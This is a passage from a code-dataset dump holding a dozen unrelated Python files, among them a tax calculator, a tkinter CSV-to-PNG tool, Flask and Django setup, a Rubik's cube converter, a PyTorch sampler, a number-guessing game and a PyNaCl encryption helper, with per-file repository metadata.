\"\"\"Sample adaptive card created using the pyadaptivecards framework.\n\n You can find out more about pyadaptivecards here: https://github.com/CiscoSE/pyadaptivecards\n \"\"\"\n def __init__(self, name):\n body = []\n actions = []\n\n # Create a greeting using the name provided\n greeting = TextBlock(\"Hey hello {}! I am an adaptive card\".format(name))\n body.append(greeting)\n\n # Create a question input\n question = Text('question', placeholder=\"Question\")\n body.append(question)\n\n # Create a submit action\n submit = Submit(title=\"Send the card!\")\n actions.append(submit)\n\n super().__init__(body=body, actions=actions)\n \n\n","repo_name":"sQu4rks/cookiecutter-pywebex-teams-bot","sub_path":"{{ cookiecutter.project_slug }}/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13519502806","text":"if True:\n import pandas as pd\n #\n from python.common.misc import muvt\n\n\nincome_tax_columns = [ \"tax, income\"\n , \"tax, income, labor + pension\"\n , \"tax, income, capital + non-labor\"\n , \"tax, income, dividend\"\n ]\n\ndef income_taxes( ppl ):\n \"\"\"Add income tax columns to ppl.\nPITFALL: The exemption for earners claiming dependents is not implemented.\"\"\"\n new_columns = pd.DataFrame()\n temp_columns = pd.DataFrame()\n temp_columns[\"taxable income, labor + pension\"] = (\n ( ppl[\"income, pension\"]\n + ( ppl[\"income, labor\"]\n - ppl[\"tax, ss, total employee contribs\"] )\n ).apply( lambda x: x - min( 0.325 * x, 5040 * muvt) )\n )\n new_columns[\"tax, income, labor + pension\"] = (\n temp_columns[\"taxable income, labor + pension\"].apply( lambda x:\n 0 if x < (1090*muvt)\n else ( (x - 1090*muvt)*0.19 if x < (1700*muvt)\n else ( (x - 1700*muvt)*0.28 + 116*muvt if x < (4100*muvt)\n else (x - 4100*muvt)*0.33 + 788*muvt ) ) ) )\n\n temp_columns[\"taxable income, capital\"] = (\n ppl[\"income, rental + interest\"].apply(\n lambda x: x - min( 0.1 * x, 1000*muvt)\n ) )\n temp_columns[\"taxable income, non-labor (tax def)\"] = (\n ppl[\"income, non-labor (tax def)\"].apply(\n lambda x: x - min( 0.1 * x, 1000*muvt)\n ) )\n\n new_columns[\"tax, income, capital + non-labor\"] = (\n ( temp_columns[\"taxable income, capital\"]\n + temp_columns[\"taxable income, non-labor (tax def)\"]\n ).apply( lambda x:\n 0 if x < ( 600*muvt)\n else ( (x - 600 *muvt)*0.1 if x < (1000*muvt)\n else ( (x - 1000*muvt)*0.2 + 40 *muvt if x < (2000*muvt)\n else ( (x - 2000*muvt)*0.3 + 240*muvt if x < (3000*muvt)\n else ( (x - 3000*muvt)*0.35 + 540*muvt if x < (4000*muvt)\n else (x - 4000*muvt)*0.4 + 870*muvt ) ) ) ) ) )\n\n new_columns[\"tax, income, dividend\"] = (\n ppl[\"income, dividend\"].apply( lambda x:\n 0 if x < ( 600*muvt)\n else ( (x - 600*muvt) * 0.05 if x < (1000*muvt)\n else (x - 1000*muvt) * 0.1 + 20*muvt ) ) )\n new_columns[\"tax, income\"] = (\n new_columns.sum( axis = 1 ) )\n\n return pd.concat( [ppl, new_columns], axis = 1 )\n","repo_name":"ofiscal/tax.co","sub_path":"python/regime/r2016.py","file_name":"r2016.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"36039373164","text":"import matplotlib.pyplot as plt\nimport csv\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom tkinter.filedialog import asksaveasfile\nimport webbrowser\nimport os\nimport shutil\n\n\ncsv_path = \"\"\npng_path = \"\"\ndefault_path = os.getcwd() + \"\\image.png\"\n\nwindow = Tk()\nimage_label = Label(window, width = 640, height = 480)\n\n\n\ndef application(): # creates application with tkinter and calls functions according to user input\n global window\n global image_label\n window.geometry(\"640x500\")\n p1 = PhotoImage(file = \"icon.png\")\n window.iconphoto(False, p1)\n window.title(\"CSV to PNG converter\")\n menubar = Menu(window)\n filemenu = Menu(menubar, tearoff = 0)\n filemenu.add_command(label = \"Open\", command = browse_files)\n filemenu.add_command(label = \"Save as...\", command = save_file)\n\n menubar.add_cascade(label = \"File\", menu = filemenu)\n\n helpmenu = Menu(menubar, tearoff = 0)\n helpmenu.add_command(label = \"About...\", command=open_github)\n menubar.add_cascade(label = \"Help\", menu = helpmenu)\n\n \n image_label.pack()\n \n \n window.config(menu = menubar)\n window.mainloop()\n\n\n\ndef open_github(): # opens github page of project\n webbrowser.open(\"https://github.com/MarcUbb/microscope_controller\")\n\n\n\ndef load_image(): # opens csv and interprets and displays it with matplotlib, also saves image to default directory\n global csv_path\n global window\n global image_label\n global default_path\n\n image = []\n\n with open(csv_path, newline='\\n') as csvfile:\n data = csv.reader(csvfile, delimiter=',')\n \n for line in data:\n image.append(line)\n\n i = 0\n while i < len(image):\n j = 0\n while j < len(image[0]):\n image[i][j] = int(image[i][j])\n j += 1\n i += 1\n \n plt.imshow(image, cmap= \"Greys\")\n plt.savefig(default_path)\n\n \n img = PhotoImage(file = default_path)\n image_label.configure(image = img)\n image_label.image = img\n\n\n\ndef save_image(): # saves image by moving it from default directory to chosen directory\n global default_path\n global png_path\n\n png_path = str(png_path)\n png_path = png_path[25:-29]\n\n shutil.move(default_path, png_path)\n\n\n\ndef browse_files(): # opens browser dialog to choose a csv file to be opened with \"load_image\" function\n filepath = filedialog.askopenfilename(initialdir = \"/\", title = \"Select a File\", filetypes = ((\"CSV File\",\"*.csv*\"),(\"all files\",\"*.*\")))\n global csv_path \n csv_path = filepath\n\n global load_image\n\n load_image()\n\n\n\ndef save_file(): # opens browser dialog to choose saving directory, calls \"save_image\" function\n filepath = asksaveasfile(initialfile = \"Untitled.png\", defaultextension = \".png\",filetypes = [(\"All Files\",\"*.*\")])\n global png_path\n png_path = filepath\n\n global save_image\n save_image()\n\n\n\ndef main():\n application()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"MarcUbb/microscope_controller","sub_path":"CSVtoPNG/CSVtoPNG.py","file_name":"CSVtoPNG.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74102385127","text":"\"\"\"\r\n@author: harumonia\r\n@license: (C) Copyright 2013-2017, Node Supply Chain Manager Corporation Limited.\r\n@contact: zxjlm233@gmail.com\r\n@software: Pycharm\r\n@file: __init__.py.py\r\n@time: 2020/12/26 13:46\r\n@desc:\r\n\"\"\"\r\nimport os\r\n\r\nfrom flask import Flask\r\nfrom application.blueprints import all_bp\r\nfrom application.extensions import db, migrate\r\nimport application.models\r\nfrom application.settings import config\r\n\r\n\r\ndef create_app(config_name=None):\r\n if config_name is None:\r\n config_name = os.getenv('FLASK_CONFIG', 'development')\r\n\r\n app = Flask('application')\r\n app.config.from_object(config[config_name])\r\n\r\n register_extensions(app)\r\n register_blueprints(app)\r\n # register_commands(app)\r\n # register_errors(app)\r\n # register_template_context(app)\r\n return app\r\n\r\n\r\ndef register_extensions(app):\r\n db.init_app(app)\r\n migrate.init_app(app, db)\r\n\r\n\r\ndef register_blueprints(app):\r\n for bp in all_bp:\r\n app.register_blueprint(bp)\r\n","repo_name":"keyinwu/Hackthon2020-Group-6","sub_path":"hackso/application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8552885868","text":"import os\r\n\r\nimport pandas as pd\r\n\r\nli = []\r\ndirectory = './data'\r\n# 1\r\nfor file in os.listdir(directory):\r\n df_temp = pd.read_csv(directory + '/' + file, index_col=0, header=0)\r\n li.append(df_temp)\r\n\r\ndf = pd.concat(li,axis=0, ignore_index=True)\r\n# df = pd.concat((pd.read_csv(directory+'/'+f, index_col=0, header=0) for f in os.listdir(directory)))\r\n# 2\r\n# shape before (x, 8)\r\ndf = df.drop(['x_t','perf'], axis='columns')\r\n# shape after (x, 6)\r\n\r\n# 3\r\n# a\r\ndf['Month'] = df['Order Date'].str[:2]\r\n# b & c\r\ndf = df.dropna(subset=['Month'])\r\ndf = df[df['Order Date'] != 'Order Date']\r\ndf['Month'] = pd.to_numeric(df['Month'], downcast=\"integer\")\r\n# d\r\ndf['Sum'] = pd.to_numeric(df['Price Each'])*pd.to_numeric(df['Quantity Ordered'], downcast=\"integer\")\r\n# e\r\nmonth_groups = df.groupby(['Month'])\r\nincome_per_month_descending = month_groups['Sum'].sum().sort_values(ascending=False)\r\n# f\r\nincome_per_month_descending.to_csv(\"income_per_month_descending.csv\")\r\n\r\n\r\n\r\n","repo_name":"tdl1304/private-misc","sub_path":"Dataingenior5.semester/PandasTest/oblig3.py","file_name":"oblig3.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13962553925","text":"import sys\nimport cv2\n\nimage = cv2.imread(sys.argv[1])\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ntile=8\nclip=2.0\nclahe = cv2.createCLAHE(clipLimit=clip,tileGridSize=(tile,tile))\nequalised = clahe.apply(gray)\ncv2.imshow(\"CLAHE\", equalised)\ncv2.waitKey(0)\n","repo_name":"AzadehNazemi/computerVision","sub_path":"ClaheEqualisation.py","file_name":"ClaheEqualisation.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36931627392","text":"import itertools\nimport torch\nfrom torch.utils.data.sampler import Sampler\nfrom visualDet3D.networks.utils.registry import SAMPLER_DICT\n\n@SAMPLER_DICT.register_module\nclass TrainingSampler(Sampler):\n \"\"\"\n In training, we only care about the \"infinite stream\" of training data.\n So this sampler produces an infinite stream of indices and\n all workers cooperate to correctly shuffle the indices and sample different indices.\n\n The samplers in each worker effectively produces `indices[worker_id::num_workers]`\n where `indices` is an infinite stream of indices consisting of\n `shuffle(range(size)) + shuffle(range(size)) + ...` (if shuffle is True)\n or `range(size) + range(size) + ...` (if shuffle is False)\n\n Note that this sampler does not shard based on pytorch DataLoader worker id.\n A sampler passed to pytorch DataLoader is used only with map-style dataset\n and will not be executed inside workers.\n But if this sampler is used in a way that it gets execute inside a dataloader\n worker, then extra work needs to be done to shard its outputs based on worker id.\n This is required so that workers don't produce identical data.\n :class:`ToIterableDataset` implements this logic.\n This note is true for all samplers in detectron2.\n \"\"\"\n\n def __init__(self, size: int, rank: int = -1, world_size: int = 1, shuffle: bool = True):\n \"\"\"\n Args:\n size (int): the total number of data of the underlying dataset to sample from\n shuffle (bool): whether to shuffle the indices or not\n seed (int): the initial seed of the shuffle. Must be the same\n across all workers. If None, will use a random seed shared\n among workers (require synchronization among all workers).\n \"\"\"\n if not isinstance(size, int):\n raise TypeError(f\"TrainingSampler(size=) expects an int. Got type {type(size)}.\")\n if size <= 0:\n raise ValueError(f\"TrainingSampler(size=) expects a positive int. Got {size}.\")\n self._size = size\n self._shuffle = shuffle\n\n self._rank = rank\n self._world_size = world_size\n self.generator = torch.Generator()\n\n def __len__(self):\n return self._size\n\n def __iter__(self):\n start = max(self._rank, 0)\n yield from itertools.islice(self._indices(), start, None, self._world_size)\n\n def _indices(self):\n if self._shuffle:\n yield from torch.randperm(self._size, generator=self.generator).tolist()\n else:\n yield from torch.arange(self._size).tolist()\n","repo_name":"Owen-Liuyuxuan/visualDet3D","sub_path":"visualDet3D/data/dataloader/distributed_sampler.py","file_name":"distributed_sampler.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"33882827015","text":"from rubik.cubiecube import CubieCube\nfrom rubik.pieces import Face, Corner, Edge, Facelet\n\n\nclass FaceCube:\n # Maps corner positions to facelet positions\n CORNER_FACELETS = [\n [Facelet.U9, Facelet.R1, Facelet.F3],\n [Facelet.U7, Facelet.F1, Facelet.L3],\n [Facelet.U1, Facelet.L1, Facelet.B3],\n [Facelet.U3, Facelet.B1, Facelet.R3],\n [Facelet.D3, Facelet.F9, Facelet.R7],\n [Facelet.D1, Facelet.L9, Facelet.F7],\n [Facelet.D7, Facelet.B9, Facelet.L7],\n [Facelet.D9, Facelet.R9, Facelet.B7],\n ]\n # Maps edge positions to facelet positions\n EDGE_FACELETS = [\n [Facelet.U6, Facelet.R2],\n [Facelet.U8, Facelet.F2],\n [Facelet.U4, Facelet.L2],\n [Facelet.U2, Facelet.B2],\n [Facelet.D6, Facelet.R8],\n [Facelet.D2, Facelet.F8],\n [Facelet.D4, Facelet.L8],\n [Facelet.D8, Facelet.B8],\n [Facelet.F6, Facelet.R4],\n [Facelet.F4, Facelet.L6],\n [Facelet.B6, Facelet.L4],\n [Facelet.B4, Facelet.R6],\n ]\n # Maps corner positions to colors\n CORNER_COLORS = [\n [Face.U, Face.R, Face.F],\n [Face.U, Face.F, Face.L],\n [Face.U, Face.L, Face.B],\n [Face.U, Face.B, Face.R],\n [Face.D, Face.F, Face.R],\n [Face.D, Face.L, Face.F],\n [Face.D, Face.B, Face.L],\n [Face.D, Face.R, Face.B],\n ]\n # Maps edge positions to colors\n EDGE_COLORS = [\n [Face.U, Face.R],\n [Face.U, Face.F],\n [Face.U, Face.L],\n [Face.U, Face.B],\n [Face.D, Face.R],\n [Face.D, Face.F],\n [Face.D, Face.L],\n [Face.D, Face.B],\n [Face.F, Face.R],\n [Face.F, Face.L],\n [Face.B, Face.L],\n [Face.B, Face.R],\n ]\n\n def __init__(self, cube_str: str):\n self.pieces = [Face[cube_str[i]] for i in range(54)]\n\n def to_cubie_cube(self) -> CubieCube:\n cubie_cube = CubieCube()\n orientation = 0\n\n for i in Corner:\n for orientation in range(3):\n # All corner names begin with either a U or D\n if self.pieces[FaceCube.CORNER_FACELETS[i][orientation]] in [Face.U, Face.D]:\n break\n\n color_1 = self.pieces[FaceCube.CORNER_FACELETS[i][(orientation + 1) % 3]]\n color_2 = self.pieces[FaceCube.CORNER_FACELETS[i][(orientation + 2) % 3]]\n\n for j in Corner:\n if color_1 == FaceCube.CORNER_COLORS[j][1] and \\\n color_2 == FaceCube.CORNER_COLORS[j][2]:\n cubie_cube.corner_permutations[i] = j\n cubie_cube.corner_orientations[i] = orientation\n break\n\n for i in Edge:\n for j in Edge:\n if self.pieces[FaceCube.EDGE_FACELETS[i][0]] == FaceCube.EDGE_COLORS[j][0] and \\\n self.pieces[FaceCube.EDGE_FACELETS[i][1]] == FaceCube.EDGE_COLORS[j][1]:\n cubie_cube.edge_permutations[i] = j\n cubie_cube.edge_orientations[i] = 0\n break\n if self.pieces[FaceCube.EDGE_FACELETS[i][0]] == FaceCube.EDGE_COLORS[j][1] and \\\n self.pieces[FaceCube.EDGE_FACELETS[i][1]] == FaceCube.EDGE_COLORS[j][0]:\n cubie_cube.edge_permutations[i] = j\n cubie_cube.edge_orientations[i] = 1\n break\n\n return cubie_cube\n","repo_name":"Arvonit/rubik","sub_path":"backend/rubik/facecube.py","file_name":"facecube.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19480314197","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('turn', views.turn, name='turn'),\n path('swap', views.swap, name='swap'),\n path('algorithm', views.algorithm, name='algorithm'),\n]\n","repo_name":"mweltin/sticks","sub_path":"website/game/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23111921757","text":"\"\"\"\r\nNumber Guessing Game\r\n\"\"\"\r\nimport random\r\n\r\nattempts_list = []\r\ndef score():\r\n if len(attempts_list) <= 0:\r\n print(\"There's no high score yet, its your for the taking\")\r\n else:\r\n print(f\"The current high score is {min(attempts_list)} attempts\")\r\n\r\ndef start_game():\r\n wanna_play = input(\"do you wanna play (enter yes or no): \")\r\n if wanna_play.lower() != \"yes\" and wanna_play.lower() != \"no\":\r\n print(\"invalid answer, enter yes or no\")\r\n wanna_play\r\n else:\r\n number = random.randint(1, 10)\r\n score()\r\n attempts = 0\r\n while wanna_play.lower() == \"yes\":\r\n try:\r\n guess = int(input(\"guess a number from one to ten: \"))\r\n if guess <=0 or guess >10:\r\n raise ValueError(\"only numbers from one to ten are valid\")\r\n if guess == number:\r\n print(\"correct, you are a champion\")\r\n attempts += 1\r\n attempts_list.append(attempts)\r\n print(f\"you got it after {attempts} attempts\")\r\n play_more = input(\"do you want to play again, (enter yes or no): \")\r\n attempts = 0\r\n score()\r\n number = random.randint(1, 10)\r\n \r\n if play_more.lower() == \"no\":\r\n print(\"Alright, Adios\")\r\n break\r\n if play_more.lower() != \"yes\" and play_more.lower() != \"no\":\r\n print(\"what do you mean, give a clear answer\")\r\n play_more\r\n \r\n elif guess < number:\r\n attempts += 1\r\n print(\"try again, its higher\")\r\n elif guess > number:\r\n attempts += 1\r\n print(\"try again, its lower\")\r\n except ValueError as e:\r\n print(f\"invalid input, {e}\")\r\n else:\r\n print(\"Adios Amigo\")\r\nstart_game()\r\n\r\n\r\n \r\n\r\n ","repo_name":"SanusiWasiu/Python-Projects","sub_path":"Number_guessing.py","file_name":"Number_guessing.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33919047869","text":"\"\"\"skills_ URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom books.views import (\n RetrieveBooks, \n RetrieveAuthors,\n CreateAuthor,\n CreateBook,\n RetrieveAuthorAPIView,\n RetrieveBookAPIView)\n#from books.views.modelview import AuthorViewSet\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path('books/', RetrieveBooks.as_view()),\n path('books/create/', CreateBook.as_view()),\n path('books//',RetrieveBookAPIView.as_view()),\n\n path('authors/', RetrieveAuthors.as_view()),\n path('authors/create/', CreateAuthor.as_view()),\n path('authors//',RetrieveAuthorAPIView.as_view()),\n]\n\n #path('viewset/authors/', AuthorViewSet.as_view({'get':'list'})),\n #path('viewset/authors/create/', AuthorViewSet.as_view({'post':'create'})),\n #path('viewset/authors//',AuthorViewSet.as_view(\n # {\n # 'get':'retrieve', \n # 'put':'partial_update', \n # 'delete': 'destroy'\n # }\n # )), \n","repo_name":"betancourtg/Books","sub_path":"skills_/skills_/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74594430567","text":"import numpy as np\n\n# A persistent class that compensates for backlash based on current and past steering angles\n# Created by brendon-ai, January 2018\n\n\n# The factor by which to multiply the delta before adding it to the steering angle\nDELTA_MULTIPLIER = 1.5\n\n# The minimum absolute value of a delta that is large enough to be considered a change in direction\nNOISE_THRESHOLD = 0.001\n\n\n# Main class with a persistent state that is used to calculate future steering angles\nclass BacklashCompensator:\n\n # Initialize global variables\n def __init__(self):\n # Storage for the previous input steering angle\n self.previous_input_steering_angle = 0\n # The delta from the previous input steering angle calculated during the previous steering angle calculation\n self.previous_delta = 0\n\n # Process a steering angle to compensate for backlash, returning a modified steering angle\n def process(self, steering_angle):\n # Calculate the delta from the previous input steering angle\n delta = steering_angle - self.previous_input_steering_angle\n # If the sign of the current delta is different from the previous delta, that is the current steering angle\n # constitutes a change in movement direction\n # And also if the absolute value of the delta is also above a certain threshold, so that overly small deltas,\n # which can probably be considered noise, are not considered a change in direction\n if np.sign(delta) != np.sign(self.previous_delta) and abs(delta) >= NOISE_THRESHOLD:\n # Add the delta multiplied by a scaling factor to the steering angle,\n # to accelerate the change in direction and take up more of the dead band\n processed_steering_angle = steering_angle + (delta * DELTA_MULTIPLIER)\n # Otherwise, the steering angle is continuing to move in the same direction\n else:\n # Use the steering angle unmodified\n processed_steering_angle = steering_angle\n # Store the current delta and steering angle for the next time this function is called\n self.previous_input_steering_angle = steering_angle\n self.previous_delta = delta\n # Return the processed steering angle\n return processed_steering_angle\n","repo_name":"bfmat/LaneDetection","sub_path":"infer/backlash_compensator.py","file_name":"backlash_compensator.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36725444209","text":"import threading\n\nclass LinkedList:\n def __init__(self):\n self.__init_link()\n def __init_link(self):\n self.prev = self\n self.next = self\n def __remove(self):\n self.prev.next = self.next\n self.next.prev = self.prev\n def remove(self):\n self.__remove()\n self.__init_link()\n def destroy(self):\n self.__remove()\n self.prev = None\n self.next = None\n def insert(self, ele):\n ele.__remove()\n ele.prev = self\n ele.next = self.next\n self.next.prev = ele\n self.next = ele\n def insert_before(self, ele):\n ele.__remove()\n ele.next = self\n ele.prev = self.prev\n self.prev.next = ele\n self.prev = ele\n\nclass _CacheItem(LinkedList):\n def __init__(self, key, data):\n LinkedList.__init__(self)\n self.data = data\n self.key = key\n self.update_count()\n def update_count(self):\n try:\n self.count = max(len(self.data), 1)\n except:\n self.count = 1\n def __str__(self):\n return str(self.data)\n def __repr__(self):\n return repr(self.data)\n\nclass RecordCache(LinkedList):\n def __init__(self, record_num):\n LinkedList.__init__(self)\n self.__record_num = record_num\n self.__lock = threading.Lock()\n self.__cache = {}\n self.__count = 0\n def _record_getter(self, key):\n pass\n def _rec_iter(self):\n rec = self.prev\n while rec is not self:\n yield rec\n rec = rec.prev\n def __repr__(self):\n with self.__lock:\n return repr({rec.key: rec.data for rec in self._rec_iter()})\n __str__ = __repr__\n def get(self, key):\n try:\n with self.__lock:\n rec = self.__cache[key]\n rec.remove()\n self.insert(rec)\n return rec.data\n except:\n pass\n record = self._record_getter(key)\n self._put_cache(key, record)\n return record\n def _put_cache(self, key, records):\n with self.__lock:\n try:\n rec = self.__cache[key]\n rec.data = records\n old_count = rec.count\n rec.update_count()\n new_count = rec.count\n self.__count += new_count - old_count\n rec.remove()\n self.insert(rec)\n return\n except:\n pass\n while self.__count > self.__record_num:\n if self.prev is self:\n self.__count = 0\n break\n self.__count -= self.prev.count\n old_rec = self.prev\n del self.__cache[old_rec.key]\n old_rec.destroy()\n rec = _CacheItem(key, records)\n self.insert(rec)\n self.__count += rec.count\n self.__cache[key] = rec\n","repo_name":"bec5-group/bec5-web","sub_path":"becv_logger/record_cache.py","file_name":"record_cache.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23787023027","text":"from nacl.public import PrivateKey, PublicKey, Box\nfrom nacl.signing import SigningKey\nfrom nacl.encoding import Base64Encoder\n\n\ndef encrypt(\n public_key: PublicKey, private_key: PrivateKey, data: bytes, encoder=Base64Encoder\n) -> bytes:\n \"\"\"\n Encrypt a message using NaCl\n \"\"\"\n box = Box(private_key, public_key)\n return box.encrypt(data, encoder=encoder)\n\n\ndef base64_encrypt_and_sign_str(\n encryption_key_b64: str, recv_pub_key_b64: str, signing_key_b64: str, data: str\n) -> str:\n signing_key = SigningKey(signing_key_b64.encode(\"utf-8\"), encoder=Base64Encoder)\n encryption_key = PrivateKey(\n encryption_key_b64.encode(\"utf-8\"), encoder=Base64Encoder\n )\n recv_pub_key = PublicKey(recv_pub_key_b64.encode(\"utf-8\"), encoder=Base64Encoder)\n\n # Sign data first\n signed_data = signing_key.sign(data.encode(\"utf-8\"))\n\n # Encrypt data\n encrypted_data = encrypt(\n recv_pub_key, encryption_key, signed_data, encoder=Base64Encoder\n )\n\n return encrypted_data.decode(\"utf-8\")\n","repo_name":"cbrnrd/maliketh","sub_path":"client/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"39592274012","text":"import time\n\n\ndef parse(filename: str) -> str:\n with open(filename, \"r\") as f:\n line = f.readline().strip()\n return line\n\n\nField = list[int]\nRock = list[int]\nrocks = [\n [0b0011110],\n [0b0001000, 0b0011100, 0b0001000],\n [0b0000100, 0b0000100, 0b0011100],\n [0b0010000, 0b0010000, 0b0010000, 0b0010000],\n [0b0011000, 0b0011000],\n]\n\nstate_print_map = [[\" \", \"\\033[33m@\\033[0m\"],\n [\"\\033[34m#\\033[0m\", \"\\033[31m×\\033[0m\"]]\n\n\ndef left_collision(rock: Rock, top: int, field: Field) -> bool:\n for y in range(len(rock)):\n r_l = rock[y] << 1\n left_mask = 128 + field[top - y]\n if r_l & left_mask > 0:\n return True\n\n\ndef right_collision(rock: Rock, top: int, field: Field) -> bool:\n for y in range(len(rock)):\n r_l = rock[y] >> 1\n if rock[y] & 1 > 0 or r_l & field[top - y] > 0:\n return True\n\n\ndef bottom_collision(rock: Rock, top: int, field: Field) -> bool:\n if top - len(rock) < 0:\n return True\n\n for y in range(len(rock)):\n if field[top - y - 1] & rock[y] > 0:\n return True\n return False\n\n\ndef print_state(field: Field, rock: Rock, top: int, wind: str, commands: str, cmd_idx: int, n_rocks: int):\n n_lines = 40\n print(f\"\\r\\u001b[{n_lines+5}A\")\n l_wind = \"»\" if wind == \">\" else \" \"\n r_wind = \"«\" if wind == \"<\" else \" \"\n highest_rock_index = highest_rock(field)\n c_per_line = max(30, len(commands)//(n_lines-1))\n print(f\"rock: {n_rocks}\")\n for idx, line in enumerate(field[::-1]):\n cmd_str = \"\"\n if idx * c_per_line < len(commands):\n for c in range(idx * c_per_line, min(len(commands), (idx+1) * c_per_line)):\n if c == cmd_idx:\n cmd_str = cmd_str + f\"\\033[46m{commands[c]}\\033[0m\"\n else:\n cmd_str = cmd_str + commands[c]\n\n if idx == n_lines:\n break\n idx = len(field) - 1 - idx\n rock_index = top - idx\n r_str = \"0000000\"\n if rock_index >= 0 and rock_index < len(rock):\n r_str = \"{0:07b}\".format(rock[rock_index])\n s = \"{0:07b}\".format(line)\n l_str = \"\".join([state_print_map[int(a)][int(b)]\n for a, b in zip(s, r_str)])\n i_str = \" \"\n\n l_delim = \"│\"\n r_delim = \"│\"\n if idx % 10 == 0 and idx != highest_rock_index:\n i_str = f\"{idx:5}\"\n l_str = l_str.replace(\" \", \"\\033[36m┄\\033[0m\")\n r_delim = \"\\033[36m┾\\033[0m\"\n l_delim = \"\\033[36m┽\\033[0m\"\n if idx == highest_rock_index:\n i_str = f\"\\033[31m{idx:5}\\033[0m\"\n l_str = l_str.replace(\" \", \"\\033[31m┄\\033[0m\")\n r_delim = \"\\033[31m┾\\033[0m\"\n l_delim = \"\\033[31m┽\\033[0m\"\n\n print(f\"{i_str} {l_wind} {l_delim}{l_str}{r_delim} {r_wind} {cmd_str}\")\n # print(f\"{i_str} {l_wind} |{l_str}| {r_wind}\")\n if n_lines < len(field):\n print(f\"\\033[35m{len(field)-n_lines:5} ┽┄┄┄┄┄┄┄┾\\033[0m\")\n else:\n print(\" 0 └───────┘\")\n\n\ndef spaw_rock(i: int) -> Rock:\n return rocks[i % 5].copy()\n\n\ndef highest_rock(field: Field) -> int:\n for idx, line in enumerate(field):\n if line == 0:\n return idx - 1\n return 0\n\n\ndef required_field_hight(field: Field, rock: Rock) -> int:\n return highest_rock(field) + len(rock) + 4\n\n\ndef main():\n commands = parse(\"test.txt\")\n rock_id = 1\n rock = spaw_rock(0)\n\n field = [0] * required_field_hight([0], rock)\n rt = len(field) - 1\n t = 0\n\n r_rocks = 0\n use_r_rocks = False\n t_rocks = 2022\n n_rocks = 0\n while n_rocks < t_rocks:\n # push rock\n if commands[t] == \"<\" and not left_collision(rock, rt, field):\n for i in range(len(rock)):\n rock[i] = rock[i] << 1\n elif commands[t] == \">\" and not right_collision(rock, rt, field):\n for i in range(len(rock)):\n rock[i] = rock[i] >> 1\n print_state(field, rock, rt, commands[t], commands, t, n_rocks)\n\n if bottom_collision(rock, rt, field):\n for i in range(len(rock)):\n field[rt - i] += rock[i]\n\n n_rocks += 1\n if n_rocks == r_rocks and use_r_rocks:\n use_r_rocks = False\n if n_rocks == t_rocks:\n break\n rock = spaw_rock(rock_id)\n\n required_hight = required_field_hight(field, rock)\n additional = required_hight - len(field)\n if additional > 0:\n field += [0]*additional\n if additional < 0:\n field = field[:additional]\n\n rt = len(field) - 1\n rock_id += 1\n else:\n rt -= 1\n\n print_state(field, rock, rt, \"\", commands, t, n_rocks)\n t = (t+1) % len(commands)\n if not use_r_rocks:\n in_str = input()\n if in_str != \"\":\n use_r_rocks = True\n r_rocks = int(in_str)\n\n print_state(field, rock, rt, \"\", commands, t, n_rocks)\n print(highest_rock(field)+1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"StephanBischoff-Digle/adventofcode","sub_path":"2022/17/Python/proto1.py","file_name":"proto1.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39449472715","text":"from typing import List, Dict\n\ndef get_top_track_info(sp, range):\n tracks = []\n track_ids = []\n top_tracks = sp.current_user_top_tracks(time_range=range, limit=50)['items']\n for track in top_tracks:\n track_info = {}\n track_info['image'] = track['album']['images'][-1] if track['album']['images'] else False\n 